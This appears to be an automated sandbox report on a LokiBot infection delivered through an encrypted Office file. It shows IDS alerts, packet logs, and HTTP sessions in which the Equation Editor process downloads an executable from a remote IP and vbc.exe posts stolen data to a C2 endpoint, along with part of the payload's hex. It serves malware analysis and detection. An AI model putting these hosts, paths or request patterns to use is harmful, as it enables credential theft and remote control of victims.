                            Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                            General
                            Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                            File Type:data
                            Stream Size:200
                            Entropy:3.13335930328
                            Base64 Encoded:False
                            Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                            Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                            General
                            Stream Path:\x6DataSpaces/Version
                            File Type:data
                            Stream Size:76
                            Entropy:2.79079600998
                            Base64 Encoded:False
                            Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                            Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                            Stream Path: EncryptedPackage, File Type: data, Stream Size: 1345224
                            General
                            Stream Path:EncryptedPackage
                            File Type:data
                            Stream Size:1345224
                            Entropy:7.99980515236
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . O . . ; . v i . . . . Z . & R . _ ; . . . . ! . . . ! . . . . . . . f m . x . . . . . . . . . q . : . A . ^ $ . h . . ( . . > . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ . & . . . . . . . . O . Q o @ .
                            Data Raw:b7 86 14 00 00 00 00 00 4f bf fc 3b 1b 76 69 fe a8 9b 7f 5a 9f 26 52 fe 5f 3b fd d2 b5 8d 21 a5 c4 da 21 f9 ac c6 ff e5 fd f0 66 6d 87 78 8a d9 8a d9 0e e5 f7 81 a9 71 cb 3a cb 41 f5 5e 24 85 68 ee c6 28 8a fa 3e 02 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94 26 b4 fc c0 20 18 a2 d3 80 fd 4f 18 51 6f 40 94
                            Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                            General
                            Stream Path:EncryptionInfo
                            File Type:data
                            Stream Size:224
                            Entropy:4.56563786614
                            Base64 Encoded:False
                            Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . c . . . . . & . . 2 B e . . . 2 . . k . 0 . . . l O . w . x . . . . . . 0 . u D . . . k . . 7 . . . - X . T . . < . . . . . . . c . . [
                            Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                            Network Behavior

                            Snort IDS Alerts

                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                            06/16/21-12:29:47.751148 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49168 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:47.751148 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49168 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:47.751148 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49168 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:47.751148 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49168 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:48.840134 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49169 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:48.840134 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49169 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:48.840134 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49169 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:48.840134 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49169 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:49.987019 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49170 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:49.987019 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49170 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:49.987019 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49170 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:49.987019 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49170 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:51.153026 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49171 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:51.153026 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49171 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:51.153026 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49171 | 80 | 192.168.2.22 | 63.141.228.141
                            06/16/21-12:29:51.153026 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49171 | 80 | 192.168.2.22 | 63.141.228.141

                            Network Port Distribution

                            TCP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jun 16, 2021 12:29:38.771471977 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.016647100 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.016779900 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.017275095 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.263397932 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.263458967 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.263478041 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.263520002 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.263636112 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.263788939 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.508369923 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.508416891 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.508446932 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.508479118 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.508508921 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.508539915 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.508569002 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.508569002 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.508589983 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.508593082 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.508594990 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.508605957 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.508641005 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.753947973 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754000902 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754154921 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.754188061 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754226923 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.754271030 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754308939 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.754405975 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754440069 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.754513025 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754549980 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.754681110 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754717112 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.754734039 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754769087 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.754874945 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754921913 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.754954100 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.754998922 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.755079985 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.755127907 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.755218029 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.755264997 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.755294085 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.755332947 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.755394936 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.755429983 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.755485058 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.755520105 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.755530119 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.755553007 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.758675098 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.998930931 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.998970032 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999012947 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999043941 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999056101 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999069929 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999088049 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999090910 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999105930 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999106884 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999149084 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999155998 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999187946 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999197960 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999221087 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999221087 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999253035 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999262094 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999284029 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999286890 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999313116 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999334097 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999346972 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999349117 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999377012 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999386072 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999408007 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999413013 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999444008 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999449015 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999469042 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999486923 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999501944 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999516010 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999532938 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999568939 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999573946 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999587059 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999617100 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999622107 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999650955 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999650955 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999682903 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22
                            Jun 16, 2021 12:29:39.999686956 CEST | 49167 | 80 | 192.168.2.22 | 103.89.90.94
                            Jun 16, 2021 12:29:39.999715090 CEST | 80 | 49167 | 103.89.90.94 | 192.168.2.22

                            HTTP Request Dependency Graph

                            • 103.89.90.94
                            • 63.141.228.141

                            HTTP Packets

                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.22 | 49167 | 103.89.90.94 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            Timestamp | kBytes transferred | Direction | Data
                            Jun 16, 2021 12:29:39.017275095 CEST | 0 | OUT | GET /pzldoc/regasm.exe HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                            Host: 103.89.90.94
                            Connection: Keep-Alive
                            Jun 16, 2021 12:29:39.263397932 CEST | 1 | IN | HTTP/1.1 200 OK
                            Date: Wed, 16 Jun 2021 10:29:38 GMT
                            Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                            Last-Modified: Wed, 16 Jun 2021 00:49:42 GMT
                            ETag: "ba000-5c4d77753dec3"
                            Accept-Ranges: bytes
                            Content-Length: 761856
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: application/x-msdownload
                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 4a c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 94 0b 00 00 0a 00 00 00 00 00 00 de b2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 b2 0b 00 4b 00 00 00 00 c0 0b 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 3f b2 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 92 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 06 00 00 00 c0 0b 00 00 08 00 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b2 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 26 01 00 68 05 01 00 03 00 00 00 01 00 00 06 50 2c 02 00 ef 85 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 13 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bb 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 03 00 00 00 16 39 53 00 00 00 26 02 16 
28 11 00 00 0a 38 0b 00 00 00 26 20 01 00 00 00 38 3b 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 2a 00 00 00 02 16 28 07 00 00 06 20 06 00 00 00 38 19 00 00 00 02 16 28 09 00 00 06 38 bb ff ff ff 20 03 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 c2 ff ff ff a0 ff ff ff c2 ff ff ff b1 ff ff ff 90 ff ff ff 89 ff ff ff 10 00 00 00 2f 00 00 00 20 05 00 00 00 28 05 00 00 06 3a cc ff ff ff 26 02 16 28 08 00 00 06 16 28 05 00 00 06 39 73 ff ff ff 26 20 00 00 00 00 16 39 ad ff ff ff 26 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 6f 23 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 12 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 13 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 15 00 00 0a 2a 00 2e 2b 02 26 16 00 28 15 00 00 06 2a 3a 2b 02 26 16 fe 09 00 00 6f 21 00 00 06 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 16 00
                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJ` @ @K,? H.text `.rsrc,@@.reloc@BH&hP,j+&(((o*0+&+& 9S&(8& 8;( 8*( 8(8 E/ (:&((9s& 9&*V+&(((*V+&(o#(*+&*+&*J+&(*J+&(*J+&(*J+&(*.+&(*:+&o!*J+&(


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            1 | 192.168.2.22 | 49168 | 63.141.228.141 | 80 | C:\Users\Public\vbc.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Jun 16, 2021 12:29:47.751147985 CEST | 807 | OUT | POST /32.php/S4wFP8QBww9Tp HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.141.228.141
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: B78A3212
                            Content-Length: 176
                            Connection: close
                            Jun 16, 2021 12:29:48.545754910 CEST | 808 | IN | HTTP/1.1 404 Not Found
                            Date: Wed, 16 Jun 2021 10:29:47 GMT
                            Server: Apache
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            2 | 192.168.2.22 | 49169 | 63.141.228.141 | 80 | C:\Users\Public\vbc.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Jun 16, 2021 12:29:48.840133905 CEST | 819 | OUT | POST /32.php/S4wFP8QBww9Tp HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.141.228.141
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: B78A3212
                            Content-Length: 176
                            Connection: close
                            Jun 16, 2021 12:29:49.679653883 CEST | 820 | IN | HTTP/1.1 404 Not Found
                            Date: Wed, 16 Jun 2021 10:29:48 GMT
                            Server: Apache
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            3 | 192.168.2.22 | 49170 | 63.141.228.141 | 80 | C:\Users\Public\vbc.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Jun 16, 2021 12:29:49.987019062 CEST | 830 | OUT | POST /32.php/S4wFP8QBww9Tp HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.141.228.141
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: B78A3212
                            Content-Length: 149
                            Connection: close
                            Jun 16, 2021 12:29:50.833703995 CEST | 832 | IN | HTTP/1.1 404 Not Found
                            Date: Wed, 16 Jun 2021 10:29:50 GMT
                            Server: Apache
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            4 | 192.168.2.22 | 49171 | 63.141.228.141 | 80 | C:\Users\Public\vbc.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Jun 16, 2021 12:29:51.153026104 CEST | 842 | OUT | POST /32.php/S4wFP8QBww9Tp HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.141.228.141
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: B78A3212
                            Content-Length: 149
                            Connection: close
                            Jun 16, 2021 12:29:51.991955042 CEST | 844 | IN | HTTP/1.1 404 Not Found
                            Date: Wed, 16 Jun 2021 10:29:51 GMT
                            Server: Apache
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
